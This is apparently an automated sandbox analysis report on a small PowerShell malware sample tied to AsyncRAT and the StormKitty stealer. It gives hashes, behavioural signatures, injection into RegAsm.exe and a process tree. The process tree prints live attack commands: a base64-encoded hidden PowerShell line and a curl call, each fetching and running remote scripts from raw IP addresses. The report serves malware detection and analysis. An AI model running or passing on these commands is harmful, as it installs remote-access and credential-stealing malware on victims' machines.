Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
92s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03/01/2025, 03:16
Static task
static1
Behavioral task
behavioral1
Sample
1c98e715eb65ef733d18ece227297105e5dcea55ab37dc177778da3ff714da21.ps1
Resource
win7-20240729-en
General
-
Target
1c98e715eb65ef733d18ece227297105e5dcea55ab37dc177778da3ff714da21.ps1
-
Size
168B
-
MD5
2dc54835b9c45ed739a864b1732f7cd6
-
SHA1
7df3a0414a8972dcb6c025f14646d8570a117b40
-
SHA256
1c98e715eb65ef733d18ece227297105e5dcea55ab37dc177778da3ff714da21
-
SHA512
42a57f6d58b302e3a239dbb2e1f282d1b8d1446f93bc60e65933da64361a876c238d12b2eae3ab53eaf20f1973888714363e628beb9d718a9f5d827416aea40f
Malware Config
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/4692-60-0x0000000000400000-0x0000000000704000-memory.dmp family_stormkitty -
Stormkitty family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 5 1108 powershell.exe 8 1108 powershell.exe 17 4944 powershell.exe -
pid Process 4592 powershell.exe 1108 powershell.exe 4944 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4944 set thread context of 4692 4944 powershell.exe 94 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4592 powershell.exe 4592 powershell.exe 1108 powershell.exe 1108 powershell.exe 1108 powershell.exe 1108 powershell.exe 4944 powershell.exe 4944 powershell.exe 4692 RegAsm.exe 4692 RegAsm.exe 4692 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4592 powershell.exe Token: SeDebugPrivilege 1108 powershell.exe Token: SeDebugPrivilege 4944 powershell.exe Token: SeDebugPrivilege 4692 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4692 RegAsm.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 4592 wrote to memory of 1108 4592 powershell.exe 86 PID 4592 wrote to memory of 1108 4592 powershell.exe 86 PID 1108 wrote to memory of 3328 1108 powershell.exe 87 PID 1108 wrote to memory of 3328 1108 powershell.exe 87 PID 3328 wrote to memory of 3808 3328 cmd.exe 88 PID 3328 wrote to memory of 3808 3328 cmd.exe 88 PID 3328 wrote to memory of 4944 3328 cmd.exe 89 PID 3328 wrote to memory of 4944 3328 cmd.exe 89 PID 3808 wrote to memory of 5040 3808 cmd.exe 90 PID 3808 wrote to memory of 5040 3808 cmd.exe 90 PID 4944 wrote to memory of 4724 4944 powershell.exe 91 PID 4944 wrote to memory of 4724 4944 powershell.exe 91 PID 4724 wrote to memory of 4252 4724 csc.exe 92 PID 4724 wrote to memory of 4252 4724 csc.exe 92 PID 4944 wrote to memory of 4692 4944 powershell.exe 94 PID 4944 wrote to memory of 4692 4944 powershell.exe 94 PID 4944 wrote to memory of 4692 4944 powershell.exe 94 PID 4944 wrote to memory of 4692 4944 powershell.exe 94 PID 4944 wrote to memory of 4692 4944 powershell.exe 94 PID 4944 wrote to memory of 4692 4944 powershell.exe 94 PID 4944 wrote to memory of 4692 4944 powershell.exe 94 PID 4944 wrote to memory of 4692 4944 powershell.exe 94
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\1c98e715eb65ef733d18ece227297105e5dcea55ab37dc177778da3ff714da21.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4592 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdAByAHcAcwBmAGcALgBwAHMAMQAgAHwAIABpAGUAeAA=2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\system32\cmd.execmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps14⤵
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\system32\curl.execurl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps15⤵PID:5040
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jz0demgd\jz0demgd.cmdline"5⤵
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB95D.tmp" "c:\Users\Admin\AppData\Local\Temp\jz0demgd\CSCF872008EF85B4AECBB688B36E967C51D.TMP"6⤵PID:4252
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4692
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
64B
MD5f537ae521efb4e130b96c6baef339c61
SHA1542a0a5af1576420842f9600d6fd37a17d1dfaec
SHA25685fe9d7c91403c511b7cf060fe3d509510d709b133deb537a407301f71d7264f
SHA512b1b3aa4adf6039f549bdca35c2ed44d2d80d3142558533eaad327440f77ed801426e35f39425a4973601b85ebe5cfd5dd41e973997cfcddae29fe46d2a09c5f0
-
Filesize
1KB
MD58cc6f75cee94ec81ebb0affc8f9e6067
SHA109899dcda145b49054103dbde53f56af018ce84f
SHA256f3edf555378d440fa91a3e6691b15b73420fef4f2e0aa2444d7b9c12dd45621f
SHA51271e6e73fb6e95f320b672871528873b072132c991e93d2e56b1060758096c03cc52ebb1c4b70539029fc1dd53becb0b00e4388c88b9d908942f6cf248e5b5ebf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9KB
MD534bd2b7019b88374f7f90dd59444be5b
SHA1e9a0d9a954c0154ee4bc2bd1b8795d203add460c
SHA256a773f14ea742c498c6559856f2bd8604646107ad82623bd7fc4d483ac49e3e3a
SHA51259e0cf97acfd72de911a98a42bb5d19b7c0b7470fd97e76def3bd404a87cd8390b469077d2d41df2ce403cdd62a4a7c5bc238feea611e1ac9473add2f3b07518
-
Filesize
3KB
MD5bb445d197063475c8d78de4f0825753c
SHA1158a8e3b278affe7c1185aad67683e4253cf53dd
SHA2567066e4a496d83ee1b677ade06c868a432bb4a0dd364b19ee184147a527b11c10
SHA512173cd8a56e2fa6e8db33bc13870f8751473251aa80be2235321e62b0f84961e9fd00a236aec63342d73f262dbc7c2a920951a1a8f41707ca6640e673f21c4307
-
Filesize
652B
MD523ba47f7a23ec0f885aaf502e2e2b996
SHA1ab801d437d6ce12600cf0493cfa8b0994e720762
SHA2561c55ea2862b6ab6c8f4d66a1b15c32b0c914598d00fcc7b4409952b2a82b73e6
SHA512a825048e0130d56f03f985c1e20f9704a4c784f54814878764311d8c3e74e049bfe200d727dc2d9f2daeda3faf2dbe4cfdd990c9831f96f1d358322d9a792d8c
-
Filesize
10KB
MD5b5c3a2d03ff4c721192716f326c77dea
SHA16b754fd988ca58865674b711aba76d3c6b2c5693
SHA256ab42fe5fd08cb87663e130f99f96124fdd37d825d081b9712b0bad8b6f270fac
SHA512d32e5a98c12b6b85d1913555ea54f837cd0fc647ca945aef9d75ffade06506be1f4a2348827f11c4eeae0796e4156c8f352e3c0f9a6e2cdc93cb501bcdf2c248
-
Filesize
204B
MD59a95f080b96e4e217107cbdb8f0101cd
SHA1869fbe60e1cac976f7a06b0be3cb5db202fe1592
SHA25623855ae07dc485f9cccc376ce2c7479e1ab808cc50da50f028b184456f49046f
SHA51227bd87623dd2f8054ff5caf47dc62c8882abf1c0bc4d8d703d4f7af1a18db9d9aa0b91adf5734d7ffdc47e30913a2a8b6bc05fa8adc3ca1d2deca739e0534010